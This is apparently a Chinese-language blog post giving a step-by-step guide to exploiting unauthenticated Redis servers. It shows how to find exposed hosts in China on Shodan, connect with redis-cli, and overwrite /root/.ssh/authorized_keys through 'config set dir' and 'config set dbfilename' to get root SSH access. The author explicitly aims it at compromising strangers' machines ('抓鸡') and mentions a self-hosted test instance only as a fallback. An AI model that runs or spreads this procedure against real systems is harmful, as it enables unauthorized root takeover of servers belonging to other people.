简介
上次介绍了一个kong的未经授权访问漏洞,那个漏洞不能直接入侵到宿主机,所以今天继续介绍个未经授权访问漏洞
redis如果你没有设置过密码的话,默认是没有密码所有人都可以直接连接的,所以你可以利用这个特点去抓鸡
寻找目标
和上次一样,我们这次还是使用shadon来寻找目标主机,登陆shadon然后搜索
redis port:"6379" country:"CN"
之后找可以看到版本的主机,不要找类似于下面的
-DENIED Redis is running in protected mode because protected mode is enabled, no bind address was specified, no authentication password is requested to clients. In this mode connections are only accepted from the loopback interface. If you want to connect from external computers to Redis you may ...
连接
如果你本地不想安装redis客户端的话可以这么做
docker run -it redis bash
docker真的是个好东西
之后使用cli连接
redis-cli -h ip
之后输入ping查看是不是可以正常连接
ping
注入ssh公钥提权
这个时候你是可以访问redis了,但是不能访问宿主机,所以我们下面就是为了访问宿主机
生成ssh秘钥
apt update && apt install ssh
ssh-keygen
一直回车
接着查看公钥
cat ~/.ssh/id_rsa.pub
然后修改数据库存放目录
config set dir /root/.ssh/
设置数据库数据库文件名
config set dbfilename authorized_keys
之后设置一条数据写入公钥
set x "\n\n\nssh-rsa ...公钥...root@33dsd14d90988\n\n\n"
写入数
据
save
如果显示
(error) ERR
说明不是使用root启动的redis或者不能往/root/.ssh/
中写入文件
如果显示ok,那么你就成功了
之后就是直接ssh到这台主机中
ssh root@ip
如果你成功了,就说明可以了,当然,因为这个漏洞出现了太久,很多主机都会失败的,所以最好自己搭建一个redis玩玩
欢迎关注我的博客www.bboy.app
Have Fun